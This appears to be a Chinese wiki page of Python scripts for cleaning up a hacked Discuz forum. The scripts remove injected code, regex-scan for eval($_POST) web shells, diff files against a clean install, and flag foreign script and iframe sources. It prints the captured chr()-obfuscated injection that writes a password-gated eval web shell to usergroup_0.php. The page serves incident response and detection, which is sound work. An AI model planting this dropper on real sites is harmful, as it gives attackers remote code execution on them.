====== 查找并删除木马代码 ======
import os
import sys
import re
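## Web root to clean; every file below it is examined.
n = "./"
## Exact injected snippet to strip, as bytes.  Must be filled in before running.
js = b""

# NOTE: this only removes the visible symptom.  It does not close whatever
# was used to inject the code, and rewriting files changes their mtimes, so
# take a copy of the infected tree first if the timeline matters for the
# investigation.
if not js:
    # An empty signature is "found" at offset 0 in every file, which would
    # list and rewrite the whole tree.  Refuse to run instead.
    print("js is empty: set it to the injected code before running")
else:
    for root, dirs, files in os.walk(n):
        # Optional filter used by the original author (disabled):
        #   if root.find('/attachments') == -1: ...
        for f in files:
            path = root + "/" + f
            try:
                # Binary mode: apart from the removed snippet the file is
                # written back byte-for-byte, whatever its encoding.
                with open(path, "rb") as fh:
                    sContent = fh.read()
            except (IOError, OSError):
                # Broken symlink, permission problem, ...: report and go on.
                print(path + ": unreadable, skipped")
                continue
            if sContent.find(js) == -1:
                continue
            print(path)
            s = sContent.replace(js, b"")
            # Never truncate a file to zero bytes.  A file that consists
            # only of the snippet is listed above but left untouched and
            # has to be reviewed by hand.
            if s:
                with open(path, "wb") as fh:
                    fh.write(s)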
下载: {{python:remove_iframe.py.txt|}}
====== 查找web shell代码 ======
查找所有 eval($_POST)类似代码
import os
import sys
import re
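## Web root to scan; every .php file below it is examined.
n = "./"
## Matches eval( applied directly to request data: $_POST, $_GET, $_REQUEST
## or $_COOKIE, with optional whitespace, case-insensitively.
## A bytes pattern is used so files can be scanned without decoding them.
## Limitation: only the literal text is matched.  A shell whose payload is
## assembled at runtime (chr() chains, base64_decode, ...) is not reported,
## and files with other extensions are not scanned.
p = re.compile(br"eval\s*\(\s*\$_(?:post|get|request|cookie)\s*", re.I)
for root, dirs, files in os.walk(n):
    # Optional filter used by the original author (disabled):
    #   if root.find('/attachments') == -1: ...
    for f in files:
        # Check the extension first so that non-PHP files are never read.
        if not f.lower().endswith(".php"):
            continue
        path = root + "/" + f
        try:
            with open(path, "rb") as fh:
                sContent = fh.read()
        except (IOError, OSError):
            # Broken symlink, permission problem, ...: report and go on.
            print(path + ": unreadable, skipped")
            continue
        m = p.search(sContent)
        if m:
            print(path)
            # The pattern can only match ASCII, so decoding is safe.
            print("  " + m.group().decode("ascii"))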
下载:{{python:find_webshell.py.txt|}}
====== 比较代码======
比较论坛代码与原始dz代码有哪些文件不同
import os
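# Compare the deployed forum's .php files with a pristine Discuz tree.
# Output: "path <tab> deployed_size reference_size" for a file whose content
#         differs, and the bare path for a file that has no counterpart in
#         the reference tree.
# The reference tree must be the same Discuz version, obtained from a
# trusted source, otherwise the result is meaningless.
import filecmp

dzpath = "/home/kenvin/discuz/upload/"
webpath = "/data/forum"
os.chdir(webpath)
for root, dirs, files in os.walk("."):
    # Directories whose path contains one of these substrings are skipped.
    # Nothing below them is checked here, so .php files in those
    # directories need a separate scan.
    if (root.find('/attachments') != -1 or root.find('/data') != -1
            or root.find('/forumdata') != -1):
        continue
    # print(root, dirs, files)
    for f in files:
        if not f.endswith(".php"):
            continue
        live = root + "/" + f
        ref = dzpath + live
        if not os.path.exists(ref):
            # Present on the site but not in the pristine distribution.
            print(live)
            continue
        mysize = os.path.getsize(live)
        size = os.path.getsize(ref)
        # Size alone is not enough: a modified file can keep its original
        # length, so equal-sized files are compared byte by byte.
        if mysize != size or not filecmp.cmp(live, ref, shallow=False):
            print("%s \t %s %s" % (live, mysize, size))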
===== 在dz自定义风格中插入的代码 =====
变量名:
','');fputs(fopen(chr(117).chr(115).chr(101).chr(114).chr(103).chr(114).chr(111).chr(117).chr(112).chr(95).chr(48).chr(46).chr(112).chr(104).chr(112),chr(119)),chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(40).chr(115).chr(117).chr(98).chr(115).chr(116).chr(114).chr(40).chr(109).chr(100).chr(53).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(39).chr(98).chr(39).chr(93).chr(41).chr(44).chr(50).chr(56).chr(41).chr(61).chr(61).chr(39).chr(55).chr(97).chr(97).chr(97).chr(39).chr(41).chr(32).chr(38).chr(38).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(39).chr(97).chr(39).chr(93).chr(41).chr(59).chr(63).chr(62));//
===== 检查网站页面是否有不明js或iframe=====
import re
import urllib
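# Fetch one page and report every <script>/<iframe> whose src points at a
# host that is not on the allow-list.
# Limitations: only the markup returned to this client is inspected.
# Inline <script> blocks without src, and elements created at runtime by
# other scripts, are not seen.
url = "http://forum.techweb.com.cn"
# Hosts that are expected to serve scripts or frames on this page.  The
# comparison is an exact match on purpose: look-alike names such as
# "<allowed-host>.other.example" must still be reported.
olist = ['techweb.adsame.com', 'www.techweb.com.cn', 'www.google-analytics.com']
# Groups: 1 = tag name, 2 = scheme prefix, 3 = host (the lazy match stops at
# the first "/", space, ">" or closing quote).  https:// and
# protocol-relative "//host" sources are matched as well as http://.
p = re.compile(
    r"<(script|iframe)[^>]+src\s*=\s*['\"]?((?:https?:)?//)(.*?)['\"]?[ />]",
    re.I | re.S)
# urllib.urlopen is the Python 2 API, as used by the rest of this script.
c = urllib.urlopen(url).read()
m = p.findall(c)
for tag, scheme, host in m:
    # Host names are case-insensitive; normalise before the lookup.
    if host.lower() not in olist:
        msg = url + " find " + tag + " src=" + scheme + host
        print(msg)
        # Alert hook left disabled by the original author:
        #send(msg, True)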